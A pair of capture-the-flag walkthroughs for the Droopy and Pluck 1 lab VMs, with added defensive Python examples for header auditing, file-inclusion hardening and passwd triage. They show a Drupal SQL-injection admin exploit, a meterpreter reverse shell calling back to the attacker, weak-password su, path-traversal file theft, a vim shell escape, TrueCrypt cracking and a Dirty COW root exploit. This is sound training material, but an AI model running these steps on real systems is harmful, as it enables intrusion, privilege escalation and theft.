Droopy CTF VM Walkthrough

Today I’m trying to get into the Droopy CTF virtual machine. I’ll be walking through the steps I took to solve it.

So the first step is to scan the network for its IP address.

Only port 80 was open.

[Screenshot: http]

By running nikto I found:

root@pss:~/ctf/droopyCTF# nikto -h http://192.168.1.35
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.35
+ Target Hostname:    192.168.1.35
+ Target Port:        80
+ Start Time:         2017-03-27 18:46:30 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2017-03-27 18:47:28 (GMT-3) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
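Most of what nikto reports above is header hygiene: two protective headers are absent and three headers advertise exact product versions (Apache, PHP, Drupal), which is what made the exploit-db search that follows so quick. The script below is an added example, not code from the walkthrough or from nikto, that audits a response's headers for those two problems; the sample header sets are constructed from the nikto output on this page, and the audit rules are the editor's assumptions.

```python
# Added example (not from the original walkthrough): audit the response headers
# that nikto flagged. Sample header values are constructed from the nikto output
# on this page; the audit rules are the editor's assumptions.
from typing import Dict, List

# Headers the site should send, with the values considered acceptable.
REQUIRED_HEADERS = {
    "X-Frame-Options": ("DENY", "SAMEORIGIN"),
    "X-Content-Type-Options": ("nosniff",),
}

# Headers that, when they carry a version string, tell a scanner exactly what to look up.
DISCLOSING_HEADERS = ("Server", "X-Powered-By", "X-Generator")


def audit_security_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings for one HTTP response's headers.

    Header names are matched case-insensitively, as HTTP requires.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    findings: List[str] = []

    for name, acceptable in REQUIRED_HEADERS.items():
        value = lowered.get(name.lower())
        if value is None:
            findings.append(f"missing {name}")
        elif value.strip().lower() not in {v.lower() for v in acceptable}:
            findings.append(f"weak {name}: {value}")

    for name in DISCLOSING_HEADERS:
        value = lowered.get(name.lower())
        # A digit in the value almost always means a product version is being advertised.
        if value is not None and any(ch.isdigit() for ch in value):
            findings.append(f"version disclosure in {name}: {value}")

    return findings


# Constructed sample: the headers nikto reported for the Droopy box.
DROOPY_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.5",
    "X-Generator": "Drupal 7 (http://drupal.org)",
    "Content-Type": "text/html; charset=utf-8",
}

# Constructed sample: what the same server would send after hardening
# (ServerTokens Prod in Apache, expose_php = Off in php.ini, the Drupal
# generator header removed, and the two protective headers added).
HARDENED_HEADERS = {
    "Server": "Apache",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "Content-Type": "text/html; charset=utf-8",
}

if __name__ == "__main__":
    for label, hdrs in (("droopy", DROOPY_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_security_headers(hdrs) or ["no findings"])
```

Nikto also flags the missing X-XSS-Protection header; it is left out of the checks here because the browser XSS auditors it controlled have since been removed, so adding it buys nothing today. Against the constructed Droopy headers the audit reports five findings; against the hardened set it reports none.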

A “drupal 7” search on exploit-db gave me a bunch of options to try. I chose this one:

https://www.exploit-db.com/exploits/34992/
root@pss:~/ctf/droopyCTF# python 34992.py -t http://192.168.1.35 -u admin -p admin

  ______                          __     _______  _______ _____    
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |   
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |   
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
                                                                   
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

			  Discovered by:

			  Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: admin
[*] Pass: admin
[*] Url: http://192.168.1.35/?q=node&destination=node

So now I have credentials to log in and upload a reverse shell, so let’s do that. But first I needed a little trick to allow PHP content to be run: enabling the PHP filter module and creating a page that uses the PHP code text format.

[Screenshots: Logged in; Enabling the PHP filter; Added PHP code text format]

I created a reverse shell with msfvenom as follows:

root@pss:~/ctf/droopyCTF# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.38 LPORT=6000 R > shell.txt 
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

And added the page to the site :)

[Screenshot: Logged in]

root@pss:~/ctf/droopyCTF# msfconsole 
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use 
Display all 3347 possibilities? (y or n)
msf > use p
Display all 754 possibilities? (y or n)
msf > use 
Display all 3347 possibilities? (y or n)Interrupt: use the 'exit' command to quit
msf > use exploit/multi/handler 
msf exploit(handler) > set payload phpInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload php/meterpreter/reverse_tcp

^C[-] Error while running command use: 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:6000 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.38:6000 -> 192.168.1.35:46294) at 2017-03-27 20:17:45 -0300

meterpreter > shell
Process 1211 created.
Channel 1 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@droopy:/var/www/html$ 
www-data@droopy:/var/www/html$ su gsuser
su gsuser
Password: gsuser

gsuser@droopy:/var/www/html$ su
su
Password: toor

root@droopy:/var/www/html# cd ~
cd ~
root@droopy:~# ls -la
ls -la
total 5148
drwx------  3 root root    4096 Apr 12  2016 .
drwxr-xr-x 22 root root    4096 Apr 10  2016 ..
-rw-r--r--  1 root root    3106 Feb 20  2014 .bashrc
drwx------  2 root root    4096 Apr 10  2016 .cache
-rw-r--r--  1 root root 5242880 Apr 12  2016 dave.tc
-rw-r--r--  1 root root     140 Feb 20  2014 .profile
-rw-------  1 root root    3771 Apr 11  2016 .viminfo

The main issue with this VM is that the passwords were too weak: a couple of tries got me gsuser, and after playing a bit with the root account I found it had the same default root password as the Kali images for BeagleBone and Raspberry Pi, toor.

I copied dave.tc to the webroot, and downloaded it to my kali box.

[Screenshot: Logged in]

dave.tc is a TrueCrypt volume, so I cracked its password with truecrack -t dave.tc --wordlist dict.txt, which took a hell of a long time… The password was etonacademy.

Downloaded TrueCrypt from https://sourceforge.net/projects/truecrypt/files/TrueCrypt/Other/TrueCrypt-7.2-Linux-x86.tar.gz/download, and mounted the volume using the mentioned password…

[Screenshot: Logged in]

and… Done! Got the flag!

root@pss:~# cd /media/truecrypt1/
root@pss:/media/truecrypt1# ls -la
total 20
drwxr-xr-x 6 root root  1024 Apr 12  2016 .
drwxr-xr-x 4 root root  4096 Mar 28 17:30 ..
drwxr-xr-x 2 root root  1024 Apr 12  2016 buller
drwx------ 2 root root 12288 Apr 12  2016 lost+found
drwxr-xr-x 2 root root  1024 Apr 12  2016 panama
drwxr-xr-x 3 root root  1024 Apr 12  2016 .secret
root@pss:/media/truecrypt1# cat .secret/
piers.png  .top/
root@pss:/media/truecrypt1# cat .secret/.top/flag.txt 

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
root@pss:/media/truecrypt1# 

Pluck1 CTF VM Walkthrough

Today I’m trying to own the Pluck 1 CTF VM.

I started by looking at what was open:

root@pss:~/ctf/pluck# nmap -sV 192.168.1.115 -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-23 17:52 ART
Nmap scan report for 192.168.1.115
Host is up (0.074s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.50 seconds

As in most CTFs, port 80 is the first place to look for a clue.

[Screenshot: http landing page]

The source code didn’t reveal anything interesting, but the URLs did:

Let me try something. If the URL http://192.168.1.115/index.php?page=contact.php has its page param loading a file called contact.php, I should also be able to hit http://192.168.1.115/contact.php directly and get the same page. Let’s take a look…

OK!! It worked! I only lost the CSS styling that was inherited from the index.php page.

I also confirmed that it includes not only PHP files but any file on the server, like http://192.168.1.115/index.php?page=js/jquery.min.js, which I knew was there from looking at the landing page source.
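The behaviour just observed is a classic local file inclusion: whatever the page parameter names gets joined to the web root and read, `..` segments included. As an added example (not code from the walkthrough or from the Pluck box, whose index.php is not shown), the following models that resolution in Python beside a hardened version that combines an allowlist with a containment check. The web root, the allowlist of page names and the sample parameters are constructed assumptions; nothing here touches the filesystem.

```python
# Added example (not from the original walkthrough): the include behaviour observed
# above, modelled in Python, beside a hardened version. Paths and the allowlist are
# constructed assumptions about the box; nothing here touches the filesystem.
import os
from typing import Optional
from urllib.parse import unquote

WEBROOT = "/var/www/html"

# Pages index.php legitimately switches between (assumed from the box's tar listing).
ALLOWED_PAGES = {"index.php", "about.php", "contact.php"}


def vulnerable_resolve(webroot: str, page_param: str) -> str:
    """What include($_GET['page'])-style code ends up opening.

    The URL-decoded parameter is joined to the web root and normalised;
    '..' segments simply walk out of the root, as seen on this page.
    """
    page = unquote(page_param)
    return os.path.normpath(os.path.join(webroot, page))


def hardened_resolve(webroot: str, page_param: str) -> Optional[str]:
    """Resolve a page parameter, or return None if it must be rejected.

    Two independent checks: an allowlist of page names, and a lexical containment
    check that the normalised path still sits under the web root. Either alone
    would stop the traversal shown on this page; keeping both means a mistake in
    one is not fatal. A production version should also apply os.path.realpath so
    that symlinks inside the web root cannot point outside it.
    """
    page = unquote(page_param)
    if "\x00" in page:                      # null bytes truncated paths in older PHP
        return None
    if page not in ALLOWED_PAGES:           # anything not explicitly offered is refused
        return None
    root = os.path.normpath(webroot)
    target = os.path.normpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root:
        return None                         # lexical containment failed
    return target


if __name__ == "__main__":
    # Constructed sample parameters, including the ones used on this page.
    for param in ("contact.php", "js/jquery.min.js",
                  "../../../etc/passwd", "..%2F..%2F..%2Fbackups%2Fbackup.tar"):
        print(f"{param!r:45} vulnerable -> {vulnerable_resolve(WEBROOT, param)}")
        print(f"{'':45} hardened   -> {hardened_resolve(WEBROOT, param)}")
```

The same two checks translate directly to PHP: a switch or in_array() over the allowed page names, plus a realpath() comparison against the web root before the include. The allowlist is what also closes the jquery.min.js case above, where no traversal is involved but a non-PHP file is still served through the include.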

[Screenshot: jQuery fetched]

Let’s try to get to the / directory. I’m not sure how many folders we will need to go back, but we know that from there we can reach the server config file, normally at /etc/apache2/apache2.conf.

[Screenshot: apache2.conf]

Looking at the page source, it’s more human-friendly.

[Screenshot: apache2.conf as page source]

Eeeeasy, let’s get shadow! No shadow or shadow-, but passwd was there:

[Screenshot: passwd file]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Ok, so we have root and several usernames to try:

root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu

The problem is that we have no passwords for them.

There is another user that caught my attention:

backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
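The triage just done by eye (who has uid 0, who has a real shell, whose shell is a script or a menu) is exactly what a reviewer of a leaked passwd file should automate, because a login shell that is really a script runs with that user's privileges on every login. The parser below is an added example, not code from the walkthrough; the sample input is a constructed excerpt of the passwd listing shown above, and the shell classifications are the editor's assumptions (on a real host, extend LOGIN_SHELLS from /etc/shells).

```python
# Added example (not from the original walkthrough): parse a passwd file and pull
# out the accounts a reviewer should look at first. The sample below is a
# constructed excerpt of the passwd listing shown on this page.
from typing import Dict, List

# Shells that give an interactive login (extend from /etc/shells on a real host).
LOGIN_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh",
                "/usr/bin/bash", "/usr/bin/zsh"}
# Shells that deny or neutralise login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text: str) -> List[dict]:
    """Parse passwd(5) lines into dicts; blank, comment and malformed lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> Dict[str, list]:
    """Group accounts by what a defender would want to check about them."""
    entries = parse_passwd(text)
    return {
        # Any uid 0 account other than root is a backdoor until proven otherwise.
        "uid0": [e["name"] for e in entries if e["uid"] == 0],
        # Accounts with a normal shell: the ones that need strong passwords or key-only auth.
        "interactive": [e["name"] for e in entries if e["shell"] in LOGIN_SHELLS],
        # Anything else is a custom or menu shell: read it, it runs as that user on login.
        "custom_shell": [(e["name"], e["shell"]) for e in entries
                         if e["shell"] not in LOGIN_SHELLS | NOLOGIN_SHELLS],
    }


# Constructed excerpt of the passwd file recovered from the Pluck box (see listing above).
PLUCK_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
"""

if __name__ == "__main__":
    for group, members in audit_passwd(PLUCK_PASSWD).items():
        print(f"{group}: {members}")
```

On the constructed excerpt the audit returns root as the only uid 0 account, root, bob and peter as interactive users, and two custom shells: paul's pdmenu and backup-user's backup.sh, both of which the walkthrough goes on to use.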

Let’s try to fetch that backup script file.

[Screenshot: backup script]

The backup was pointing to a tar file, so let’s download it!

root@pss:~/ctf/pluck# wget http://192.168.1.115/index.php?page=../../../backups/backup.tar
--2017-03-23 18:55:00--  http://192.168.1.115/index.php?page=../../../backups/backup.tar
Connecting to 192.168.1.115:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.php?page=..%2F..%2F..%2Fbackups%2Fbackup.tar.1’

e=..%2F..%2F..%2Fbackups%2     [                                <=>    ] 896.15M  --.-KB/s               ^C

root@pss:~/ctf/pluck# mv index.php\?page\=..%2F..%2F..%2Fbackups%2Fbackup.tar.1 backup.tar.1
root@pss:~/ctf/pluck# vim backup.tar.1
root@pss:~/ctf/pluck# mv backup.tar.1 backup.tar
root@pss:~/ctf/pluck# tar -xvf backup.tar 
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php

Looking at the tar contents closely, only paul seems to have a way in, with some of his keys. So let’s try them.

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key1 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key2 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key3 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115

The fourth one worked! It dropped me into this pdmenu binary, which had an option to edit a file, opening vim.

[Screenshot: edit file]

Then, from vim, you could run:

:set shell=/bin/bash
:shell

This gave me a shell:

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115
Last login: Fri Mar 24 00:36:38 2017 from 192.168.1.38

paul@pluck:~$ whoami
paul
paul@pluck:~$ 

I searched for files with the SUID bit set:

paul@pluck:~$ find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I searched for exploits and found the best candidate to be Dirty COW, which exploits a Linux kernel vulnerability. So I checked if gcc was installed:

paul@pluck:~$ gcc --version
gcc (Ubuntu 6.2.0-5ubuntu12) 6.2.0 20161005
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Then I fetched the Dirty COW exploit:

paul@pluck:~$ wget https://exploit-db.com/download/40616
--2017-03-24 01:41:18--  https://exploit-db.com/download/40616
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4965 (4.8K) [application/txt]
Saving to: ‘40616’

40616               100%[================>]   4.85K  --.-KB/s    in 0s      

2017-03-24 01:41:20 (612 MB/s) - ‘40616’ saved [4965/4965]

paul@pluck:~$ mv 40616 cow.c
paul@pluck:~$ vim cow.c 
paul@pluck:~$ gcc cow.c -o cow -pthread
cow.c: In function ‘procselfmemThread’:
cow.c:99:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
         lseek(f,map,SEEK_SET);
                 ^~~
In file included from cow.c:28:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^~~~~
cow.c: In function ‘main’:
cow.c:136:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
     ^~~~~~~~
cow.c:140:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
     fstat(f,&st);
     ^~~~~
cow.c:142:30: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘__off_t {aka long int}’ [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
            
                              ^

One of the big problems I had was that when running the exploit, I had only 1~2 seconds to operate before the CTF VM froze completely.

While researching, I found a comment about running echo 0 > /proc/sys/vm/dirty_writeback_centisecs to make the Dirty COW exploit work properly.

So I copied it, and as soon as I got a shell, I pasted and ran the command. Then it was just a matter of going to the root folder to find the flag.

paul@pluck:~$ ./cow 
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 54256
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
